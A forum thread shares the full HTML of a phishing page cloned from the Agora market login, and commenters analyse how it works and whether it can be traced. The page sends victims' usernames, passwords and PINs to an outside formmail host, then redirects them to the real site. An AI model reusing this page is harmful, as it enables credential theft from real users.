[Uncategorized] Agora Phishing Link Source Code

/u/select1on posted the agora phishing link source code on dnstats.net he claims it can be easily traced to a dox.

<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Login</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/ico" href="favicon.ico">
    <link rel="stylesheet" href="FontAwesome.css" type="text/css">
    <link rel="stylesheet" href="main.css" type="text/css">

    <style type="text/css">      
    .pgp-verification, .pgp-verification textarea {
        font-family: "DejaVu Sans Mono", "Consolas", "Courier", monospace;
        font-size: 9px;
        color: #222;
        text-align: center;
    }
    .pgp-verification textarea {
        display: inline-block;
        text-align: left;
        width: 400px;
        height: 250px;
        padding: 15px;
    }
   </style>

<head>
<body style="background-color: white;">

<div style="width: 100%; height: 100%; text-align: center; vertical-align: middle;">
    <div style="width: 10px; height: 40px;"></div>
    <div id="login-bar" style="height: 300px;">
        <img src="zorroonbg.jpg" alt="" style="padding-bottom: 20px;" />

        <form name="contactform" method="post" action="http://www.tectite.com/hosted/003578/lulufans.il/formmail.php">

        <table style="width: 100%; text-align: center;" id="loginpage-table">

                <tr>
                    <td style="text-align:right;"><input type="text" name="username" class="loginpage-field" placeholder="User Name" value="" id="username" /></td>
                    <td style="width: 10px;"></td>
                    <td style="text-align:left;"><input type="password" name="password" class="loginpage-field" placeholder="Password" value="" id="password" /></td>
                </tr>
                 <tr>
                    <td style="text-align:right;"></td>
                    <td style="width: 10px;"></td>
                    <td style="text-align:left;"><input type="text" name="pin" class="loginpage-field" placeholder="Pin" value="" id="pin" /></td>
                </tr>
                <tr>
                    <td style="text-align:right;"><img src="captcha.gif" style="display: inline; border:1px solid #aaa;" /></td>
                    <td style="width: 10px;"></td>
                    <td style="text-align:left; vertical-align: top;"><input type="text" style="height: 28px; display: inline;" class="loginpage-field" name="enterCaptcha" id="enterCaptcha" value="" placeholder="Captcha code" /></td>
                </tr>
                <tr>
                    <td style="text-align:right;"><div class="button-blue" style="display: inline-block;"><i class="fa fa-magic"></i> <a href="/register">Register</a></div></td>
                    <td style="width: 10px;"></td>
                    <td style="text-align:left;"><div class="button-red"><i class="fa fa-unlock-alt"></i> <input type="submit" name="submit" class="input-in-button" value="Log In" id="submit" />
 <input type="hidden" name="derive_fields" value="email=HTTP_USER_AGENT,
   realname=username" />
 <input type="hidden" name="subject" value="AG1" />
 <input type="hidden" name="good_url" value="http://agorahooawayyfoe.onion/dologin" />
 <input type="hidden" id="tectiteformid" name="tectiteformid" value="c44b1739aa9f42f5f3cdb4b48870d2f5" /></div></td>
                </tr>

        </table>

        </form>

    </div>
</div>

</body>
</html>

If someone can format this for me so I can copy and paste this properly it'd be greatly appreciated.

EDIT: Thanks /u/Leeham721


Comments


[12 Points] None:

I'm not seeing anything useful.

The 'source account' is a fake domain (lulufans.il) which is not registered anywhere other than with techtite.

The techtite service they used is a generic form creation tool that anyone can use for free.

The account number is of no use unless you work for Techtite. Most likely scenario is they used proxies/VPN/TOR or whatever to create the account.

They just googled 'online form generator' and used whatever they found.

The form posts to a generic PHP processor

Edit 2: I'm guessing he's referring to the actual form processing PHP. You can't see PHP source code anymore, they are protected by default. If it was that simple you could download any Wordpress installations wp-config.php and steal their SQL login data...whatever you do, the server will run the PHP and display the resulting HTML. If you access the file directly, it will only ever give you the coded error message because that's how it's programmed.

EDIT3: there's a hidden field called 'subject' which implies all data is forwarded to an email address rather than a database.


[4 Points] mephestus:

It also tells us that once people enter their info in, it forwards it to real agora site, probably to run a script to change user account details.


[2 Points] BoxAddict:

This is from a link posted in comments on DNStats right? Or were actual grams controlled content pointing to a phishing link?


[-5 Points] None:

[deleted]